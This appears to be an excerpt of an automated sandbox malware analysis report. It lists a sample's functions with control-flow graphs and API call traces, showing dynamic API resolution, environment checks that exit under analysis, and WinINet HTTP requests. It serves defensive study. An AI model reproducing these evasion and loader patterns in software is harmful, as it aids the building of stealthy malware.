                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 4a4e03c62d6352186eaf276089c2d8911c2bf7230932717c46030085f9366bf9
                                • Instruction ID: 69020d0e2fabb66fb873ab170b9183a66ea9e72598d6aa961028510468d3359c
                                • Opcode Fuzzy Hash: 4a4e03c62d6352186eaf276089c2d8911c2bf7230932717c46030085f9366bf9
                                • Instruction Fuzzy Hash: A4527E71A0021A9BDB21EBA5DC59BAF77B5AF44304F04812BF905A7351DF7CAC41CBA8
                                Function 004F6390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2125 4f6390-4f63bd GetPEB 2126 4f65c3-4f6623 LoadLibraryA * 5 2125->2126 2127 4f63c3-4f65be call 4f62f0 GetProcAddress * 20 2125->2127 2128 4f6638-4f663f 2126->2128 2129 4f6625-4f6633 GetProcAddress 2126->2129 2127->2126 2132 4f666c-4f6673 2128->2132 2133 4f6641-4f6667 GetProcAddress * 2 2128->2133 2129->2128 2134 4f6688-4f668f 2132->2134 2135 4f6675-4f6683 GetProcAddress 2132->2135 2133->2132 2137 4f66a4-4f66ab 2134->2137 2138 4f6691-4f669f GetProcAddress 2134->2138 2135->2134 2139 4f66ad-4f66d2 GetProcAddress * 2 2137->2139 2140 4f66d7-4f66da 2137->2140 2138->2137 2139->2140
                                APIs
                                • GetProcAddress.KERNEL32(76210000,00CF1560), ref: 004F63E9
                                • GetProcAddress.KERNEL32(76210000,00CF1770), ref: 004F6402
                                • GetProcAddress.KERNEL32(76210000,00CF15A8), ref: 004F641A
                                • GetProcAddress.KERNEL32(76210000,00CF1500), ref: 004F6432
                                • GetProcAddress.KERNEL32(76210000,00CF91A0), ref: 004F644B
                                • GetProcAddress.KERNEL32(76210000,00CE6818), ref: 004F6463
                                • GetProcAddress.KERNEL32(76210000,00CE6558), ref: 004F647B
                                • GetProcAddress.KERNEL32(76210000,00CF16F8), ref: 004F6494
                                • GetProcAddress.KERNEL32(76210000,00CF1578), ref: 004F64AC
                                • GetProcAddress.KERNEL32(76210000,00CF1740), ref: 004F64C4
                                • GetProcAddress.KERNEL32(76210000,00CF15C0), ref: 004F64DD
                                • GetProcAddress.KERNEL32(76210000,00CE6678), ref: 004F64F5
                                • GetProcAddress.KERNEL32(76210000,00CF15D8), ref: 004F650D
                                • GetProcAddress.KERNEL32(76210000,00CF1788), ref: 004F6526
                                • GetProcAddress.KERNEL32(76210000,00CE6538), ref: 004F653E
                                • GetProcAddress.KERNEL32(76210000,00CF1758), ref: 004F6556
                                • GetProcAddress.KERNEL32(76210000,00CF1728), ref: 004F656F
                                • GetProcAddress.KERNEL32(76210000,00CE65D8), ref: 004F6587
                                • GetProcAddress.KERNEL32(76210000,00CF1848), ref: 004F659F
                                • GetProcAddress.KERNEL32(76210000,00CE66B8), ref: 004F65B8
                                • LoadLibraryA.KERNEL32(00CF1860,?,?,?,004F1C03), ref: 004F65C9
                                • LoadLibraryA.KERNEL32(00CF1878,?,?,?,004F1C03), ref: 004F65DB
                                • LoadLibraryA.KERNEL32(00CF1890,?,?,?,004F1C03), ref: 004F65ED
                                • LoadLibraryA.KERNEL32(00CF18A8,?,?,?,004F1C03), ref: 004F65FE
                                • LoadLibraryA.KERNEL32(00CF17E8,?,?,?,004F1C03), ref: 004F6610
                                • GetProcAddress.KERNEL32(75B30000,00CF1800), ref: 004F662D
                                • GetProcAddress.KERNEL32(751E0000,00CF1818), ref: 004F6649
                                • GetProcAddress.KERNEL32(751E0000,00CF1830), ref: 004F6661
                                • GetProcAddress.KERNEL32(76910000,00CF95C0), ref: 004F667D
                                • GetProcAddress.KERNEL32(75670000,00CE6698), ref: 004F6699
                                • GetProcAddress.KERNEL32(77310000,00CF9210), ref: 004F66B5
                                • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004F66CC
                                Strings
                                • NtQueryInformationProcess, xrefs: 004F66C1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: NtQueryInformationProcess
                                • API String ID: 2238633743-2781105232
                                • Opcode ID: dae85a2a36fdad9be594dc3f6f909dd4e44656420838edb931c7350b18046ee2
                                • Instruction ID: 4b962c9f689c32943d9b5873100d90965267d96afb5b48f3e3ae4b747a98045f
                                • Opcode Fuzzy Hash: dae85a2a36fdad9be594dc3f6f909dd4e44656420838edb931c7350b18046ee2
                                • Instruction Fuzzy Hash: 8CA160B5611206DFD794DF64EC48A2637B9F788344700C71AEA95C3362EF7CA840DB69
                                Function 004F1BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2141 4f1bf0-4f1c0b call 4d2a90 call 4f6390 2146 4f1c0d 2141->2146 2147 4f1c1a-4f1c27 call 4d2930 2141->2147 2148 4f1c10-4f1c18 2146->2148 2151 4f1c29-4f1c2f lstrcpy 2147->2151 2152 4f1c35-4f1c63 2147->2152 2148->2147 2148->2148 2151->2152 2156 4f1c6d-4f1c7b GetSystemInfo 2152->2156 2157 4f1c65-4f1c67 ExitProcess 2152->2157 2158 4f1c7d-4f1c7f ExitProcess 2156->2158 2159 4f1c85-4f1ca0 call 4d1030 call 4d10c0 GetUserDefaultLangID 2156->2159 2164 4f1cb8-4f1cca call 4f2ad0 call 4f3e10 2159->2164 2165 4f1ca2-4f1ca9 2159->2165 2171 4f1ccc-4f1cde call 4f2a40 call 4f3e10 2164->2171 2172 4f1ce7-4f1d06 lstrlen call 4d2930 2164->2172 2165->2164 2166 4f1cb0-4f1cb2 ExitProcess 2165->2166 2171->2172 2183 4f1ce0-4f1ce1 ExitProcess 2171->2183 2178 4f1d08-4f1d0d 2172->2178 2179 4f1d23-4f1d40 lstrlen call 4d2930 2172->2179 2178->2179 2181 4f1d0f-4f1d11 2178->2181 2186 4f1d5a-4f1d7b call 4f2ad0 lstrlen call 4d2930 2179->2186 2187 4f1d42-4f1d44 2179->2187 2181->2179 2184 4f1d13-4f1d1d lstrcpy lstrcat 2181->2184 2184->2179 2193 4f1d7d-4f1d7f 2186->2193 2194 4f1d9a-4f1db4 lstrlen call 4d2930 2186->2194 2187->2186 2189 4f1d46-4f1d54 lstrcpy lstrcat 2187->2189 2189->2186 2193->2194 2195 4f1d81-4f1d85 2193->2195 2199 4f1dce-4f1deb call 4f2a40 lstrlen call 4d2930 2194->2199 2200 4f1db6-4f1db8 2194->2200 2195->2194 2197 4f1d87-4f1d94 lstrcpy lstrcat 2195->2197 2197->2194 2206 4f1ded-4f1def 2199->2206 2207 4f1e0a-4f1e0f 2199->2207 2200->2199 2201 4f1dba-4f1dc8 lstrcpy lstrcat 2200->2201 2201->2199 2206->2207 2208 4f1df1-4f1df5 2206->2208 2209 4f1e16-4f1e22 call 4d2930 2207->2209 2210 4f1e11 call 4d2a20 2207->2210 2208->2207 2211 4f1df7-4f1e04 lstrcpy lstrcat 2208->2211 2215 4f1e24-4f1e26 2209->2215 2216 4f1e30-4f1e66 call 4d2a20 * 5 OpenEventA 2209->2216 2210->2209 2211->2207 2215->2216 2217 4f1e28-4f1e2a lstrcpy 2215->2217 2228 4f1e8c-4f1ea0 CreateEventA call 4f1b20 call 4effd0 2216->2228 2229 4f1e68-4f1e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 4f1ea5-4f1eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                                APIs
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1560), ref: 004F63E9
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1770), ref: 004F6402
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF15A8), ref: 004F641A
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1500), ref: 004F6432
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF91A0), ref: 004F644B
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CE6818), ref: 004F6463
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CE6558), ref: 004F647B
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF16F8), ref: 004F6494
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1578), ref: 004F64AC
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF1740), ref: 004F64C4
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF15C0), ref: 004F64DD
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CE6678), ref: 004F64F5
                                  • Part of subcall function 004F6390: GetProcAddress.KERNEL32(76210000,00CF15D8), ref: 004F650D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F1C2F
                                • ExitProcess.KERNEL32 ref: 004F1C67
                                • GetSystemInfo.KERNEL32(?), ref: 004F1C71
                                • ExitProcess.KERNEL32 ref: 004F1C7F
                                  • Part of subcall function 004D1030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004D1046
                                  • Part of subcall function 004D1030: VirtualAllocExNuma.KERNEL32(00000000), ref: 004D104D
                                  • Part of subcall function 004D1030: ExitProcess.KERNEL32 ref: 004D1058
                                  • Part of subcall function 004D10C0: GlobalMemoryStatusEx.KERNEL32 ref: 004D10EA
                                  • Part of subcall function 004D10C0: ExitProcess.KERNEL32 ref: 004D1114
                                • GetUserDefaultLangID.KERNEL32 ref: 004F1C8F
                                • ExitProcess.KERNEL32 ref: 004F1CB2
                                • ExitProcess.KERNEL32 ref: 004F1CE1
                                • lstrlen.KERNEL32(00CF9260), ref: 004F1CEE
                                • lstrcpy.KERNEL32(00000000,?), ref: 004F1D15
                                • lstrcat.KERNEL32(00000000,00CF9260), ref: 004F1D1D
                                • lstrlen.KERNEL32(00504B98), ref: 004F1D28
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D48
                                • lstrcat.KERNEL32(00000000,00504B98), ref: 004F1D54
                                • lstrlen.KERNEL32(00000000), ref: 004F1D63
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1D89
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1D94
                                • lstrlen.KERNEL32(00504B98), ref: 004F1D9F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1DBC
                                • lstrcat.KERNEL32(00000000,00504B98), ref: 004F1DC8
                                • lstrlen.KERNEL32(00000000), ref: 004F1DD7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1DF9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1E04
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                                • String ID:
                                • API String ID: 3366406952-0
                                • Opcode ID: 5c07ac231f74c5aa1e7895a23ec053b9552400e7647729c21efe5c16c444af60
                                • Instruction ID: 485bda9c3c0d9d276c86ba6b482ecda9fbb06308d4cc5543419f17dc91ba7f13
                                • Opcode Fuzzy Hash: 5c07ac231f74c5aa1e7895a23ec053b9552400e7647729c21efe5c16c444af60
                                • Instruction Fuzzy Hash: 7471A33164021AEBDB20ABB1DD49B7F3A79AF50705F04811AFB46962B1DF7C9801CB6D
                                Function 004D6C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2234 4d6c40-4d6c64 call 4d2930 2237 4d6c75-4d6c97 call 4d4bc0 2234->2237 2238 4d6c66-4d6c6b 2234->2238 2242 4d6c99 2237->2242 2243 4d6caa-4d6cba call 4d2930 2237->2243 2238->2237 2239 4d6c6d-4d6c6f lstrcpy 2238->2239 2239->2237 2244 4d6ca0-4d6ca8 2242->2244 2247 4d6cbc-4d6cc2 lstrcpy 2243->2247 2248 4d6cc8-4d6cf5 InternetOpenA StrCmpCA 2243->2248 2244->2243 2244->2244 2247->2248 2249 4d6cfa-4d6cfc 2248->2249 2250 4d6cf7 2248->2250 2251 4d6ea8-4d6ebb call 4d2930 2249->2251 2252 4d6d02-4d6d22 InternetConnectA 2249->2252 2250->2249 2261 4d6ebd-4d6ebf 2251->2261 2262 4d6ec9-4d6ee0 call 4d2a20 * 2 2251->2262 2253 4d6d28-4d6d5d HttpOpenRequestA 2252->2253 2254 4d6ea1-4d6ea2 InternetCloseHandle 2252->2254 2256 4d6e94-4d6e9e InternetCloseHandle 2253->2256 2257 4d6d63-4d6d65 2253->2257 2254->2251 2256->2254 2259 4d6d7d-4d6dad HttpSendRequestA HttpQueryInfoA 2257->2259 2260 4d6d67-4d6d77 InternetSetOptionA 2257->2260 2265 4d6daf-4d6dd3 call 4f71e0 call 4d2a20 * 2 2259->2265 2266 4d6dd4-4d6de4 call 4f3d90 2259->2266 2260->2259 2261->2262 2263 4d6ec1-4d6ec3 lstrcpy 2261->2263 2263->2262 2266->2265 2275 4d6de6-4d6de8 2266->2275 2277 4d6e8d-4d6e8e InternetCloseHandle 2275->2277 2278 4d6dee-4d6e07 InternetReadFile 2275->2278 2277->2256 2278->2277 2280 4d6e0d 2278->2280 2282 4d6e10-4d6e15 2280->2282 2282->2277 2283 4d6e17-4d6e3d call 4f7310 2282->2283 2286 4d6e3f call 4d2a20 2283->2286 2287 4d6e44-4d6e51 call 4d2930 2283->2287 2286->2287 2291 4d6e61-4d6e8b call 4d2a20 InternetReadFile 2287->2291 2292 4d6e53-4d6e57 2287->2292 2291->2277 2291->2282 2292->2291 2293 4d6e59-4d6e5b lstrcpy 2292->2293 2293->2291
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D6C6F
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6CC2
                                • InternetOpenA.WININET(004FCFEC,00000001,00000000,00000000,00000000), ref: 004D6CD5
                                • StrCmpCA.SHLWAPI(?,00CFF9E8), ref: 004D6CED
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004D6D15
                                • HttpOpenRequestA.WININET(00000000,GET,?,00CFF0A8,00000000,00000000,-00400100,00000000), ref: 004D6D50
                                • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 004D6D77
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004D6D86
                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 004D6DA5
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004D6DFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D6E5B
                                • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 004D6E7D
                                • InternetCloseHandle.WININET(00000000), ref: 004D6E8E
                                • InternetCloseHandle.WININET(?), ref: 004D6E98
                                • InternetCloseHandle.WININET(00000000), ref: 004D6EA2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D6EC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                • String ID: ERROR$GET
                                • API String ID: 3687753495-3591763792
                                • Opcode ID: 37d708a764bfedbbe4ecceb020fbbbb4357a9afe7ac538142d17a440d10e6b22
                                • Instruction ID: 74725a5d662788a9f1fede25c3ea769f345765cfe0f32422e9356770e684f37c
                                • Opcode Fuzzy Hash: 37d708a764bfedbbe4ecceb020fbbbb4357a9afe7ac538142d17a440d10e6b22
                                • Instruction Fuzzy Hash: C9819071B1021AABDB20DFA5DC55BAF77B8EF44700F11815AFA05E7381DB78AD048B98
                                Function 004D4A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2850 4d4a60-4d4afc RtlAllocateHeap 2867 4d4afe-4d4b03 2850->2867 2868 4d4b7a-4d4bbe VirtualProtect 2850->2868 2869 4d4b06-4d4b78 2867->2869 2869->2868
                                APIs
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D4AA3
                                • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 004D4BB0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeapProtectVirtual
                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-3329630956
                                • Opcode ID: 0c9e5b821777c04d3e596bd096541de6e39cfc4739df19914f185c74ba2758a5
                                • Instruction ID: 30acc71d64ec9274921abd173ea3d91efee2838824f93adaf0ac391e3e5711da
                                • Opcode Fuzzy Hash: 0c9e5b821777c04d3e596bd096541de6e39cfc4739df19914f185c74ba2758a5
                                • Instruction Fuzzy Hash: 5B31AFA9B8026D76D620FFEF4C47F5F6E55FF85BA0B028877B608571C0C9A15501CEA2
                                Function 004F2A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 004F2A6F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2A76
                                • GetUserNameA.ADVAPI32(00000000,00000104), ref: 004F2A8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: a4fe5464ea983aa9d7dae20eca57bc4344b1ad95bfd82a03624b51d1685950b9
                                • Instruction ID: c5504a45571814a486bf300a29571f0527a5fd47afd2f0efbf2299ea65a2c8e8
                                • Opcode Fuzzy Hash: a4fe5464ea983aa9d7dae20eca57bc4344b1ad95bfd82a03624b51d1685950b9
                                • Instruction Fuzzy Hash: FFF0B4B1A40609EBC700DF98DD49B9EBBBCF704B21F104216FA15E3680DBB8190486A5
                                Function 004F66E0 Relevance: 210.7, APIs: 115, Strings: 5, Instructions: 696libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
